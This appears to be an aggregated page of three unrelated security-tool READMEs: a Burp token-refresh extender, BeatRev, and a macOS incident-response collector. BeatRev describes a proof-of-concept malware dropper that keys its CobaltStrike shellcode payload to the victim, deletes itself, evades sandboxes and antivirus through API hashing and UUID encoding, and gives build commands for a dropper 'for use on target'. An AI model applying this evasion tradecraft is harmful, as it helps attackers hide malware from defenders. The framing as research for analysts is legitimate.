    • Invalid Bearer token(http://HOST:PORT/api/v1/exams/MQ==/) from Repeater makes the response as 401.
    • Extender will match this condition and start running the recorded steps, extract the "access_token"
    • Replace the access token(from step ii) in actual response(from Repeater) and makes this invalid request as valid.
    • In the repeater console, you see 200 OK response.
  8. Do the Step7 again and check the flow
    • This time extender will not invoke the steps because existing token is valid and so it uses that.

Built With

  • SWING - Used to add panel

Contributing

Please read CONTRIBUTING.md for details on our code of conduct, and the process for submitting pull requests to us.

Versioning

v1.0

Authors

Authors from Synopsys - Ashwath Reddy (@ka3hk) and Manikandan Rajappan (@rmanikdn)

License

This software is released by Synopsys under the MIT license.

Acknowledgments

  • https://github.com/FrUh/ExtendedMacro ExtendedMacro was a great start - we have modified the UI to handle more complex scenarios. We have also fixed bugs and improved speed by replacing tokens in memory.

Demo Video

ATOR v2.0.0:

UI Panel was splitted into 4 different configuration. Check out the code from v2 or use the executable from v2/bin.

  1. Error Condition - Find the error condition req/res and add trigger condition [Can be statuscode/text in body content/text in header]. Multiple condition can also be added.
  2. Obtain Token: Find all the req/res to get the token. It can be single or multiple request (do replacement accordingly)
  3. Error Condition Replacement: Mark the trigger condition and also mark the place on request where replacement needs to taken (map the extraction)
  4. Preview: Dry run it before configure for scan.


BeatRev - POC For Frustrating/Defeating Malware Analysts


BeatRev Version 2

Disclaimer/Liability

The work that follows is a POC to enable malware to "key" itself to a particular victim in order to frustrate efforts of malware analysts.

I assume no responsibility for malicious use of any ideas or code contained within this project. I provide this research to further educate infosec professionals and provide additional training/food for thought for Malware Analysts, Reverse Engineers, and Blue Teamers at large.


TLDR

The first time the malware runs on a victim it AES encrypts the actual payload(an RDLL) using environmental data from that victim. Each subsequent time the malware is ran it gathers that same environmental info, AES decrypts the payload stored as a byte array within the malware, and runs it. If it fails to decrypt/the payload fails to run, the malware deletes itself. Protection against reverse engineers and malware analysts.



Updated 6 JUNE 2022



I didn't feel finished with this project so I went back and did a fairly substantial re-write. The original research and tradecraft may be found Here.

Major changes are as follows:

  1. I have released all source code
  2. I integrated Stephen Fewer's ReflectiveDLL into the project to replace Stage2
  3. I formatted some of the byte arrays in this project into string format and parse them with UuidFromStringA. This Repo was used as a template. This was done to lower entropy of Stage0 and Stage1
  4. Stage0 has had a fair bit of AV evasion built into it. Thanks to Cerbersec's Project Ares for inspiration
  5. The builder application to produce Stage0 has been included

There are quite a few different things that could be taken from the source code of this project for use elsewhere. Hopefully it will be useful for someone.

Problems with Original Release and Mitigations

There were a few shortcomings with the original release of BeatRev that I decided to try and address.

Stage2 was previously a standalone executable that was stored as the alternate data stream(ADS) of Stage1. In order to acheive the AES encryption-by-victim and subsequent decryption and execution, each time Stage1 was ran it would read the ADS, decrypt it, write back to the ADS, call CreateProcess, and then re-encrypt Stage2 and write it back to disk in the ADS. This was a lot of I/O operations and the CreateProcess call of course wasn't great.

I happened to come upon Steven Fewer's research concerning Reflective DLL's and it seemed like a good fit. Stage2 is now an RDLL; our malware/shellcode runner/whatever we want to protect can be ported to RDLL format and stored as a byte array within Stage1 that is then decrypted on runtime and executed by Stage1. This removes all of the I/O operations and the CreateProcess call from Version1 and is a welcome change.

Stage1 did not have any real kind of AV evasion measures programmed in; this was intentional, as it is extra work and wasn't really the point of this research. During the re-write I took it as an added challenge and added API-hashing to remove functions from the Import Address Table of Stage1. This has helped with detection and Stage1 has a 4/66 detection rate on VirusTotal. I was comfortable uploading Stage1 given that is is already keyed to the original box it was ran on and the file signature constantly changes because of the AES encryption that happens.

I recently started paying attention to entropy as a means to detect malware; to try and lower the otherwise very high entropy that a giant AES encrypted binary blob gives an executable I looked into integrating shellcode stored as UUID's. Because the binary is stored in string representation, there is lower overall entropy in the executable. Using this technique The entropy of Stage0 is now ~6.8 and Stage1 ~4.5 (on a max scale of 8).

Finally it is a giant chore to integrate and produce a complete Stage0 due to all of the pieces that must be manipulated. To make this easier I made a builder application that will ingest a Stage0.c template file, a Stage1 stub, a Stage2 stub, and a raw shellcode file (this was build around Stage2 being a shellcode runner containing CobaltStrike shellcode) and produce a compiled Stage0 payload for use on target.

Technical Details

The Reflective DLL code from Stephen Fewer contains some Visual Studio compiler-specific instructions; I'm sure it is possible to port the technique over to MingW but I do not have the skills to do so. The main problem here is that the CobaltStrike shellcode (stageless is ~265K) needs to go inside the RDLL and be compiled. To get around this and integrate it nicely with the rest of the process I wrote my Stage2 RDLL to contain a global variable chunk of memory that is the size of the CS shellcode; this ~265K chunk of memory has a small placeholder in it that can be located in the compiled binary. The code in src/Stage2 has this added already.

Once compiled, this Stage2stub is transfered to kali where a binary patch may be performed to stick the real CS shellcode into the place in memory that it belongs. This produces the complete Stage2.

To avoid the I/O and CreateProcess fiasco previously described, the complete Stage2 must also be patched into the compiled Stage1 by Stage0; this is necessary in order to allow Stage2 to be encrypted once on-target in addition to preventing Stage2 from being stored separately on disk. The same concept previously described for Stage2 is conducted by Stage0 on target in order to assemble the final Stage1 payload. It should be noted that the memmem function is used in order to locate the placeholder within each stub; this function is no available on Windows, so a custom implementation was used. Thanks to Foxik384 for his code.

In order to perform a binary patch, we must allocate the required memory up front; this has a compounding effect, as Stage1 must now be big enough to also contain Stage2. With the added step of converting Stage2 to a UUID string, Stage2 balloons in size as does Stage1 in order to hold it. A stage2 RDLL with a compiled size of ~290K results in a Stage0 payload of ~1.38M, and a Stage1 payload of ~700K.

The builder application only supports creating x64 EXE's. However with a little more work in theory you could make Stage0 a DLL, as well as Stage1, and have the whole lifecycle exist as a DLL hijack instead of a standalone executable.

Instructions

These instructions will get you on your way to using this POC.

  1. Compile Builder using gcc -o builder src/Builder/BeatRevV2Builder.c
  2. Modify sc_length variable in src/Stage2/dll/src/ReflectiveDLL.c to match the length of raw shellcode file used with builder ( I have included fakesc.bin for example)
  3. Compile Stage2 (in visual studio, ReflectiveDLL project uses some VS compiler-specific instructions)
  4. Move compiled stage2stub.dll back to kali, modify src/Stage1/newstage1.c and define stage2size as the size of stage2stub
  5. Compile stage1stub using x86_64-w64-mingw32-gcc newstage1.c -o stage1stub.exe -s -DUNICODE -Os -L /usr/x86_64-w64-mingw32/lib -l:librpcrt4.a
  6. Run builder using syntax: ./builder src/Stage0/newstage0_exe.c x64 stage1stub.exe stage2stub.dll shellcode.bin
  7. Builder will produce dropper.exe. This is a formatted and compiled Stage0 payload for use on target.

BeatRev Original Release

Introduction

About 6 months ago it occured to me that while I had learned and done a lot with malware concerning AV/EDR evasion, I had spent very little time concerned with trying to evade or defeat reverse engineering/malware analysis. This was for a few good reasons:

  1. I don't know anything about malware analysis or reverse engineering
  2. When you are talking about legal, sanctioned Red Team work there isn't really a need to try and frustrate or defeat a reverse engineer because the activity should have been deconflicted long before it reaches that stage.

Nonetheless it was an interesting thought experiment and I had a few colleagues who DO know about malware analysis that I could bounce ideas off of. It seemed a challenge of a whole different magnitude compared to AV/EDR evasion and one I decided to take a stab at.

Premise

My initial premise was that the malware, on the first time of being ran, would somehow "key" itself to that victim machine; any subsequent attempts to run it would evaluate something in the target environment and compare it for a match in the malware. If those two factors matched, it executes as expected. If they do not (as in the case where the sample had been transfered to a malware analysts sandbox), the malware deletes itself (Once again heavily leaning on the work of LloydLabs and his delete-self-poc).

This "key" must be something "unique" to the victim computer. Ideally it will be a combination of several pieces of information, and then further obfuscated. As an example, we could gather the hostname of the computer as well as the amount of RAM installed; these two values can then be concatenated (e.g. Client018192MB) and then hashed using a user-defined function to produce a number (e.g. 5343823956).

There are a ton of choices in what information to gather, but thought should be given as to what values a Blue Teamer could easily spoof; a MAC address for example may seem like an attractive "unique" identifier for a victim, however MAC addresses can easily be set manually in order for a Reverse Engineer to match their sandbox to the original victim. Ideally the values chosen and enumerated will be one that are difficult for a reverse engineer to replicate in their environment.

With some self-deletion magic, the malware could read itself into a buffer, locate a placeholder variable and replace it with this number, delete itself, and then write the modified malware back to disk in the same location. Combined with an if/else statement in Main, the next time the malware runs it will detect that it has been ran previously and then go gather the hostname and amount of RAM again in order to produce the hashed number. This would then be evaluated against the number stored in the malware during the first run (5343823956). If it matches (as is the case if the malware is running on the same machine as it originally did), it executes as expected however if a different value is returned it will again call the self-delete function in order to remove itself from disk and protect the author from the malware analyst.

This seemed like a fine idea in theory until I spoke with a colleague who has real malware analysis and reverse engineering experience. I was told that a reverse engineer would be able to observe the conditional statement in the malware (if ValueFromFirstRun != GetHostnameAndRAM()), and seeing as the expected value is hard-coded on one side of the conditional statement, simply modify the registers to contain the expected value thus completely bypassing the entire protection mechanism.

This new knowledge completely derailed the thought experiment and seeing as I didn't really have a use for a capability like this in the first place, this is where the project stopped for ~6 months.

Overview

This project resurfaced a few times over the intervening 6 months but each time was little more than a passing thought, as I had gained no new knowledge of reversing/malware analysis and again had no need for such a capability. A few days ago the idea rose again and while still neither of those factors have really changed, I guess I had a little bit more knowledge under my belt and couldn't let go of the idea this time.

With the aforementioned problem regarding hard-coding values in mind, I ultimately decided to go for a multi-stage design. I will refer to them as Stage0, Stage1, and Stage2.

Stage0: Setup. Ran on initial infection and deleted afterwards

Stage1: Runner. Ran each subsequent time the malware executes

Stage2: Payload. The malware you care about protecting. Spawns a process and injects shellcode in order to return a Beacon.

Lifecycle

Stage0

Stage0 is the fresh executable delivered to target by the attacker. It contains Stage1 and Stage2 as AES encrypted byte arrays; this is done to protect the malware in transit, or should a defender somehow get their hands on a copy of Stage0 (which shouldn't happen). The AES Key and IV are contained within Stage0 so in reality this won't protect Stage1 or Stage2 from a competent Blue Teamer.

Stage0 performs the following actions:

  1. Sandbox evasion.
  2. Delete itself from disk. It is still running in memory.
  3. Decrypts Stage1 using stored AES Key/IV and writes to disk in place of Stage0.
  4. Gathers the processor name and the Microsoft ProductID.
  5. Hashes this value and then pads it to fit a 16 byte AES key length. This value reversed serves as the AES IV.
  6. Decrypts Stage2 using stored AES Key/IV.
  7. Encrypts Stage2 using new victim-specific AES Key/IV.
  8. Writes Stage2 to disk as an alternate data stream of Stage1.

At the conclusion of this sequence of events, Stage0 exits. Because it was deleted from disk in step 2 and is no longer running in memory, Stage0 is effectively gone; Without prior knowledge of this technique the rest of the malware lifecycle will be a whole lot more confusing than it already is.

In step 4 the processor name and Microsoft ProductID are gathered; the ProductID is retreived from the Registry, and this value can be manually modified which presents and easy opportunity for a Blue Teamer to match their sandbox to the target environment. Depending on what environmental information is gathered this can become easier or more difficult.

Stage1

Stage1 was dropped by Stage0 and exists in the same exact location as Stage0 did (to include the name). Stage2 is stored as an ADS of Stage1. When the attacker/persistence subsequently executes the malware, they are executing Stage1.

Stage1 performs the following actions:

  1. Sandbox evasion.
  2. Gathers the processor name and the Microsoft ProductID.
  3. Hashes this value and then pads it to fit a 16 byte AES key length. This value reversed serves as the AES IV.
  4. Reads Stage2 from Stage1's ADS into memory.
  5. Decrypts Stage2 using the victim-specific AES Key/IV.
  6. Checks first two bytes of decryted Stage2 buffer; if not MZ (unsuccessful decryption), delete Stage1/Stage2, exit.
  7. Writes decrypted Stage2 back to disk as ADS of Stage1
  8. Calls CreateProcess on Stage2. If this fails (unsuccessful decryption), delete Stage1/Stage2, exit.
  9. Sleeps 5 seconds to allow Stage2 to execute + exit so it can be overwritten.
  10. Encrypts Stage2 using victim-specific AES Key/IV
  11. Writes encrypted Stage2 back to disk as ADS of Stage1.

Note that Stage2 MUST exit in order for it to be overwritten; the self-deletion trick does not appear to work on files that are already ADS's, as the self-deletion technique relies on renaming the primary data stream of the executable. Stage2 will ideally be an inject or spawn+inject executable.

There are two points that Stage1 could detect that it is not being ran from the same victim and delete itself/Stage2 in order to protect the threat actor. The first is the check for the executable header after decrypting Stage2 using the gathered environmental information; in theory this step could be bypassed by a reverse engineer, but it is a first good check. The second protection point is the result of the CreateProcess call- if it fails because Stage2 was not properly decrypted, the malware is similiary deleted. The result of this call could also be modified to prevent deletion by the reverse engineer, however this doesn't change the fact that Stage2 is encrypted and inaccessible.

Stage2

Stage2 is the meat and potatoes of the malware chain; It is a fully fledged shellcode runner/piece of malware itself. By encrypting and protecting it in the way that we have, the actions of the end state malware are much better obfuscated and protected from reverse engineers and malware analysts. During development I used one of my existing shellcode runners containing CobaltStrike shellcode, but this could be anything the attacker wants to run and protect.

Impact, Mitigation, and Further Work

So what is actually accomplished with a malware lifecycle like this? There are a few interesting quirks to talk about.

Alternate data streams are a feature unique to NTFS file systems; this means that most ways of transfering the malware after initial infection will strip and lose Stage2 because it is an ADS of Stage1. Special care would have to be given in order to transfer the sample in order to preserve Stage2, as without it a lot of reverse engineers and malware analysts are going to be very confused as to what is happening. RAR archives are able to preserve ADS's and tools like 7Z and Peazip can extract files and their ADS's.

As previously mentioned, by the time malware using this lifecycle hits a Blue Teamer it should be at Stage1; Stage0 has come and gone, and Stage2 is already encrypted with the environmental information gathered by stage 0. Not knowing that Stage0 even existed will add considerable uncertainty to understanding the lifecycle and decrypting Stage2.

In theory (because again I have no reversing experience), Stage1 should be able to be reversed (after the Blue Teamers rolls through a few copies of it because it keeps deleting itself) and the information that Stage1 gathers from the target system should be able to be identified. Provided a well-orchestrated response, Blue Team should be able to identify the victim that the malware came from and go and gather that information from it and feed it into the program so that it may be transformed appropriately into the AES Key/IV that decrypts Stage2. There are a lot "ifs" in there however related to the relative skill of the reverse engineer as well as the victim machine being available for that information to be recovered.

Application Whitelisting would significantly frustrate this lifecycle. Stage0/Stage1 may be able to be side loaded as a DLL, however I suspect that Stage2 as an ADS would present some issues. I do not have an environment to test malware against AWL nor have I bothered porting this all to DLL format so I cannot say. I am sure there are creative ways around these issues.

I am also fairly confident that there are smarter ways to run Stage2 than dropping to disk and calling CreateProcess; Either manually mapping the executable or using a tool like Donut to turn it into shellcode seem like reasonable ideas.

Code and binary

During development I created a Builder application that Stage1 and Stage2 may be fed to in order to produce a functional Stage0; this will not be provided however I will be providing most of the source code for stage1 as it is the piece that would be most visible to a Blue Teamer. Stage0 will be excluded as an exercise for the reader, and stage2 is whatever standalone executable you want to run+protect. This POC may be further researched at the effort and discretion of able readers.

I will be providing a compiled copy of this malware as Dropper64.exe. Dropper64.exe is compiled for x64. Dropper64.exe is Stage0; it contains Stage1 and Stage2. On execution, Stage1 and Stage2 will drop to disk but will NOT automatically execute, you must run Dropper64.exe(now Stage1) again. Stage2 is an x64 version of calc.exe. I am including this for any Blue Teamers who want to take a look at this, but keep in mind in an incident response scenario 99& of the time you will be getting Stage1/Stage2, Stage0 will be gone.

Conclusion

This was an interesting pet project that ate up a long weekend. I'm sure it would be a lot more advanced/more complete if I had experience in a debugger and disassembler, but you do the best with what you have. I am eager to hear from Blue Teamers and other Malware Devs what they think. I am sure I have over-complicatedly re-invented the wheel here given what actual APT's are doing, but I learned a few things along the way. Thank you for reading!



Pict - Post-Infection Collection Toolkit


This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.

If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.


How to use

The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but it will be unable to collect much of the intended data without.

Data will be collected in two forms. First is in the form of summary files, containing output of shell commands, data extracted from databases, and the like. For example, the browser module will output a browser_extensions.txt file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.

The second are complete files collected from the filesystem. These are stored in an artifacts subfolder inside the collection folder.

Syntax

The script is very simple to run. It takes only one parameter, which is required, to pass in a configuration script in JSON format:

./pict.py -c /path/to/config.json

The configuration script describes what the script will collect, and how. It should look something like this:

collection_dest

This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared.

Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.

all_users

If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.

collectors

PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.

The collectors data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused.

settings

This dictionary provides global settings.

keepLSData specifies whether the lsregister.txt file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)

zipIt specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.

moduleSettings

This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts being used with the browser module.

There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.

collectArtifacts specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.

Writing your own modules

Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py), and they must be placed in the collectors folder. A new Collector module can be easily created by duplicating the collectors/template.py file and customizing it for your own use.

def __init__(self, collectionPath, allUsers)

This method can be overridden if necessary, but the super Collector.init() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.

def printStartInfo(self)

This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.

def applySettings(self, settingsDict)

This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collection class can handle any settings that it defines.

def collect(self)

This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath, and should use filenames that are not already taken by other modules.

If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts folder, and maintaining the metadata (permissions, extended attributes, flags, etc) on the artifacts.

When the method finishes, be sure to call the super (Collector.collect(self)) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.

Your collect method can use any data collected in the basic_info.txt or lsregister.txt files found at self.collectionPath. These are collected at the beginning by the pict.py script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.

Credits

Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.



โŒ